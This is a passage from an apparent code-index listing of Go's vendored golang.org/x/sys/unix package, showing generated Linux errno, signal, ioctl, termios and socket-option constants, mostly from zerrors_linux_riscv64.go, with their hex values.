constant ENOTUNIQ (line 676) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 677) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 678) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 679) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 680) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 681) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 682) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 683) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 684) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 685) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 686) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 687) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 688) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 689) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT (line 690) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 691) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 692) | ESTALE = syscall.Errno(0x74) constant ESTRPIPE (line 693) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 694) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 695) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 696) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 697) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 698) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 699) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 700) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 705) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 706) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 707) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 708) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 709) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 710) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 711) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 712) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 713) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 714) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 715) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 716) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 717) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 718) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 719) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 720) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 721) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 722) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 723) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 724) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 725) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_riscv64.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x80081270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x40081271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x1277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x1261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x1265 constant BLKFRASET (line 36) | BLKFRASET = 0x1264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x80081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x1260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x80081272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x1278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x1279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x127b constant BLKRAGET (line 43) | BLKRAGET = 0x1263 constant BLKRASET (line 44) | BLKRASET = 0x1262 constant BLKROGET (line 45) | BLKROGET = 0x125e constant BLKROSET (line 46) | BLKROSET = 0x125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x127e constant BLKRRPART (line 48) | BLKRRPART = 0x125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x1267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x1266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x1268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x81484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x80104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x40049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x4020940d constant FLUSHO (line 87) | FLUSHO = 0x1000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x40806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x80086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x8010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x400c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x40106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x40086602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x800c6613 constant F_GETLK (line 95) | F_GETLK = 0x5 constant F_GETLK64 (line 96) | F_GETLK64 = 0x5 constant F_GETOWN (line 97) | F_GETOWN = 0x9 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0x6 constant F_SETLK64 (line 100) | F_SETLK64 = 0x6 constant F_SETLKW (line 101) | F_SETLKW = 0x7 constant F_SETLKW64 (line 102) | F_SETLKW64 = 0x7 constant F_SETOWN (line 103) | F_SETOWN = 0x8 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x80084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x90044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x80044801 constant HUPCL (line 109) | HUPCL = 0x400 constant ICANON (line 110) | ICANON = 0x2 constant IEXTEN (line 111) | IEXTEN = 0x8000 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x7b9 constant ISIG (line 115) | ISIG = 0x1 constant IUCLC (line 116) | IUCLC = 0x200 constant IXOFF (line 117) | IXOFF = 0x1000 constant IXON (line 118) | IXON = 0x400 constant MAP_ANON (line 119) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x2000 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x4000 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 129) | MAP_STACK = 0x20000 constant MAP_SYNC (line 130) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x4 constant MEMERASE (line 134) | MEMERASE = 0x40084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x40104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x40084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x80204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x80c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x80044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x80084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x40084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x40084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x40084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x4d13 constant NFDBITS (line 148) | NFDBITS = 0x40 constant NLDLY (line 149) | NLDLY = 0x100 constant NOFLSH (line 150) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 151) | NS_GET_NSTYPE = 0xb703 constant NS_GET_OWNER_UID (line 152) | NS_GET_OWNER_UID = 0xb704 constant NS_GET_PARENT (line 153) | NS_GET_PARENT = 0xb702 constant NS_GET_USERNS (line 154) | NS_GET_USERNS = 0xb701 constant OLCUC (line 155) | OLCUC = 0x2 constant ONLCR (line 156) | ONLCR = 0x4 constant OTPERASE (line 157) | OTPERASE = 0x400c4d19 constant OTPGETREGIONCOUNT (line 158) | OTPGETREGIONCOUNT = 0x40044d0e constant OTPGETREGIONINFO (line 159) | OTPGETREGIONINFO = 0x400c4d0f constant OTPLOCK (line 160) | OTPLOCK = 0x800c4d10 constant OTPSELECT (line 161) | OTPSELECT = 0x80044d0d constant O_APPEND (line 162) | O_APPEND = 0x400 constant O_ASYNC (line 163) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 164) | O_CLOEXEC = 0x80000 constant O_CREAT (line 165) | O_CREAT = 0x40 constant O_DIRECT (line 166) | O_DIRECT = 0x4000 constant O_DIRECTORY (line 167) | O_DIRECTORY = 0x10000 constant O_DSYNC (line 168) | O_DSYNC = 0x1000 constant O_EXCL (line 169) | O_EXCL = 0x80 constant O_FSYNC (line 170) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 171) | O_LARGEFILE = 0x0 constant O_NDELAY (line 172) | O_NDELAY = 0x800 constant O_NOATIME (line 173) | O_NOATIME = 0x40000 constant O_NOCTTY (line 174) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 175) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 176) | O_NONBLOCK = 0x800 constant O_PATH (line 177) | O_PATH = 0x200000 constant O_RSYNC (line 178) | O_RSYNC = 0x101000 constant O_SYNC (line 179) | O_SYNC = 0x101000 constant O_TMPFILE (line 180) | O_TMPFILE = 0x410000 constant O_TRUNC (line 181) | O_TRUNC = 0x200 constant PARENB (line 182) | PARENB = 0x100 constant PARODD (line 183) | PARODD = 0x200 constant PENDIN (line 184) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 185) | PERF_EVENT_IOC_DISABLE = 0x2401 constant PERF_EVENT_IOC_ENABLE (line 186) | PERF_EVENT_IOC_ENABLE = 0x2400 constant PERF_EVENT_IOC_ID (line 187) | PERF_EVENT_IOC_ID = 0x80082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 188) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x4008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 189) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x40042409 constant PERF_EVENT_IOC_PERIOD (line 190) | PERF_EVENT_IOC_PERIOD = 0x40082404 constant PERF_EVENT_IOC_QUERY_BPF (line 191) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 192) | PERF_EVENT_IOC_REFRESH = 0x2402 constant PERF_EVENT_IOC_RESET (line 193) | PERF_EVENT_IOC_RESET = 0x2403 constant PERF_EVENT_IOC_SET_BPF (line 194) | PERF_EVENT_IOC_SET_BPF = 0x40042408 constant PERF_EVENT_IOC_SET_FILTER (line 195) | PERF_EVENT_IOC_SET_FILTER = 0x40082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 196) | PERF_EVENT_IOC_SET_OUTPUT = 0x2405 constant PPPIOCATTACH (line 197) | PPPIOCATTACH = 0x4004743d constant PPPIOCATTCHAN (line 198) | PPPIOCATTCHAN = 0x40047438 constant PPPIOCBRIDGECHAN (line 199) | PPPIOCBRIDGECHAN = 0x40047435 constant PPPIOCCONNECT (line 200) | PPPIOCCONNECT = 0x4004743a constant PPPIOCDETACH (line 201) | PPPIOCDETACH = 0x4004743c constant PPPIOCDISCONN (line 202) | PPPIOCDISCONN = 0x7439 constant PPPIOCGASYNCMAP (line 203) | PPPIOCGASYNCMAP = 0x80047458 constant PPPIOCGCHAN (line 204) | PPPIOCGCHAN = 0x80047437 constant PPPIOCGDEBUG (line 205) | PPPIOCGDEBUG = 0x80047441 constant PPPIOCGFLAGS (line 206) | PPPIOCGFLAGS = 0x8004745a constant PPPIOCGIDLE (line 207) | PPPIOCGIDLE = 0x8010743f constant PPPIOCGIDLE32 (line 208) | PPPIOCGIDLE32 = 0x8008743f constant PPPIOCGIDLE64 (line 209) | PPPIOCGIDLE64 = 0x8010743f constant PPPIOCGL2TPSTATS (line 210) | PPPIOCGL2TPSTATS = 0x80487436 constant PPPIOCGMRU (line 211) | PPPIOCGMRU = 0x80047453 constant PPPIOCGRASYNCMAP (line 212) | PPPIOCGRASYNCMAP = 0x80047455 constant PPPIOCGUNIT (line 213) | PPPIOCGUNIT = 0x80047456 constant PPPIOCGXASYNCMAP (line 214) | PPPIOCGXASYNCMAP = 0x80207450 constant PPPIOCSACTIVE (line 215) | PPPIOCSACTIVE = 0x40107446 constant PPPIOCSASYNCMAP (line 216) | PPPIOCSASYNCMAP = 0x40047457 constant PPPIOCSCOMPRESS (line 217) | PPPIOCSCOMPRESS = 0x4010744d constant PPPIOCSDEBUG (line 218) | PPPIOCSDEBUG = 0x40047440 constant PPPIOCSFLAGS (line 219) | PPPIOCSFLAGS = 0x40047459 constant PPPIOCSMAXCID (line 220) | PPPIOCSMAXCID = 0x40047451 constant PPPIOCSMRRU (line 221) | PPPIOCSMRRU = 0x4004743b constant PPPIOCSMRU (line 222) | PPPIOCSMRU = 0x40047452 constant PPPIOCSNPMODE (line 223) | PPPIOCSNPMODE = 0x4008744b constant PPPIOCSPASS (line 224) | PPPIOCSPASS = 0x40107447 constant PPPIOCSRASYNCMAP (line 225) | PPPIOCSRASYNCMAP = 0x40047454 constant PPPIOCSXASYNCMAP (line 226) | PPPIOCSXASYNCMAP = 0x4020744f constant PPPIOCUNBRIDGECHAN (line 227) | PPPIOCUNBRIDGECHAN = 0x7434 constant PPPIOCXFERUNIT (line 228) | PPPIOCXFERUNIT = 0x744e constant PR_SET_PTRACER_ANY (line 229) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_GETFDPIC (line 230) | PTRACE_GETFDPIC = 0x21 constant PTRACE_GETFDPIC_EXEC (line 231) | PTRACE_GETFDPIC_EXEC = 0x0 constant PTRACE_GETFDPIC_INTERP (line 232) | PTRACE_GETFDPIC_INTERP = 0x1 constant RLIMIT_AS (line 233) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 234) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 235) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 236) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 237) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 238) | RNDADDENTROPY = 0x40085203 constant RNDADDTOENTCNT (line 239) | RNDADDTOENTCNT = 0x40045201 constant RNDCLEARPOOL (line 240) | RNDCLEARPOOL = 0x5206 constant RNDGETENTCNT (line 241) | RNDGETENTCNT = 0x80045200 constant RNDGETPOOL (line 242) | RNDGETPOOL = 0x80085202 constant RNDRESEEDCRNG (line 243) | RNDRESEEDCRNG = 0x5207 constant RNDZAPENTCNT (line 244) | RNDZAPENTCNT = 0x5204 constant RTC_AIE_OFF (line 245) | RTC_AIE_OFF = 0x7002 constant RTC_AIE_ON (line 246) | RTC_AIE_ON = 0x7001 constant RTC_ALM_READ (line 247) | RTC_ALM_READ = 0x80247008 constant RTC_ALM_SET (line 248) | RTC_ALM_SET = 0x40247007 constant RTC_EPOCH_READ (line 249) | RTC_EPOCH_READ = 0x8008700d constant RTC_EPOCH_SET (line 250) | RTC_EPOCH_SET = 0x4008700e constant RTC_IRQP_READ (line 251) | RTC_IRQP_READ = 0x8008700b constant RTC_IRQP_SET (line 252) | RTC_IRQP_SET = 0x4008700c constant RTC_PARAM_GET (line 253) | RTC_PARAM_GET = 0x40187013 constant RTC_PARAM_SET (line 254) | RTC_PARAM_SET = 0x40187014 constant RTC_PIE_OFF (line 255) | RTC_PIE_OFF = 0x7006 constant RTC_PIE_ON (line 256) | RTC_PIE_ON = 0x7005 constant RTC_PLL_GET (line 257) | RTC_PLL_GET = 0x80207011 constant RTC_PLL_SET (line 258) | RTC_PLL_SET = 0x40207012 constant RTC_RD_TIME (line 259) | RTC_RD_TIME = 0x80247009 constant RTC_SET_TIME (line 260) | RTC_SET_TIME = 0x4024700a constant RTC_UIE_OFF (line 261) | RTC_UIE_OFF = 0x7004 constant RTC_UIE_ON (line 262) | RTC_UIE_ON = 0x7003 constant RTC_VL_CLR (line 263) | RTC_VL_CLR = 0x7014 constant RTC_VL_READ (line 264) | RTC_VL_READ = 0x80047013 constant RTC_WIE_OFF (line 265) | RTC_WIE_OFF = 0x7010 constant RTC_WIE_ON (line 266) | RTC_WIE_ON = 0x700f constant RTC_WKALM_RD (line 267) | RTC_WKALM_RD = 0x80287010 constant RTC_WKALM_SET (line 268) | RTC_WKALM_SET = 0x4028700f constant SCM_TIMESTAMPING (line 269) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 270) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 271) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 272) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 273) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 274) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 275) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x40182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 276) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x40082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 277) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x40082104 constant SFD_CLOEXEC (line 278) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 279) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 280) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 281) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 282) | SIOCGSTAMPNS_NEW = 0x80108907 constant SIOCGSTAMP_NEW (line 283) | SIOCGSTAMP_NEW = 0x80108906 constant SIOCINQ (line 284) | SIOCINQ = 0x541b constant SIOCOUTQ (line 285) | SIOCOUTQ = 0x5411 constant SIOCSPGRP (line 286) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 287) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 288) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 289) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 290) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 291) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 292) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 293) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 294) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 295) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 296) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 297) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 298) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 299) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 300) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 301) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 302) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 303) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 304) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 305) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 306) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 307) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 308) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 309) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 310) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 311) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 312) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 313) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 314) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 315) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 316) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 317) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 318) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 319) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 320) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 321) | SO_PASSCRED = 0x10 constant SO_PASSPIDFD (line 322) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 323) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 324) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 325) | SO_PEERCRED = 0x11 constant SO_PEERGROUPS (line 326) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 327) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 328) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 329) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 330) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 331) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 332) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 333) | SO_RCVLOWAT = 0x12 constant SO_RCVMARK (line 334) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 335) | SO_RCVTIMEO = 0x14 constant SO_RCVTIMEO_NEW (line 336) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 337) | SO_RCVTIMEO_OLD = 0x14 constant SO_RESERVE_MEM (line 338) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 339) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 340) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 341) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 342) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 343) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 344) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 345) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 346) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 347) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 348) | SO_SNDLOWAT = 0x13 constant SO_SNDTIMEO (line 349) | SO_SNDTIMEO = 0x15 constant SO_SNDTIMEO_NEW (line 350) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 351) | SO_SNDTIMEO_OLD = 0x15 constant SO_TIMESTAMPING (line 352) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 353) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 354) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 355) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 356) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 357) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 358) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 359) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 360) | SO_TXTIME = 0x3d constant SO_TYPE (line 361) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 362) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 363) | SO_ZEROCOPY = 0x3c constant TAB1 (line 364) | TAB1 = 0x800 constant TAB2 (line 365) | TAB2 = 0x1000 constant TAB3 (line 366) | TAB3 = 0x1800 constant TABDLY (line 367) | TABDLY = 0x1800 constant TCFLSH (line 368) | TCFLSH = 0x540b constant TCGETA (line 369) | TCGETA = 0x5405 constant TCGETS (line 370) | TCGETS = 0x5401 constant TCGETS2 (line 371) | TCGETS2 = 0x802c542a constant TCGETX (line 372) | TCGETX = 0x5432 constant TCSAFLUSH (line 373) | TCSAFLUSH = 0x2 constant TCSBRK (line 374) | TCSBRK = 0x5409 constant TCSBRKP (line 375) | TCSBRKP = 0x5425 constant TCSETA (line 376) | TCSETA = 0x5406 constant TCSETAF (line 377) | TCSETAF = 0x5408 constant TCSETAW (line 378) | TCSETAW = 0x5407 constant TCSETS (line 379) | TCSETS = 0x5402 constant TCSETS2 (line 380) | TCSETS2 = 0x402c542b constant TCSETSF (line 381) | TCSETSF = 0x5404 constant TCSETSF2 (line 382) | TCSETSF2 = 0x402c542d constant TCSETSW (line 383) | TCSETSW = 0x5403 constant TCSETSW2 (line 384) | TCSETSW2 = 0x402c542c constant TCSETX (line 385) | TCSETX = 0x5433 constant TCSETXF (line 386) | TCSETXF = 0x5434 constant TCSETXW (line 387) | TCSETXW = 0x5435 constant TCXONC (line 388) | TCXONC = 0x540a constant TFD_CLOEXEC (line 389) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 390) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 391) | 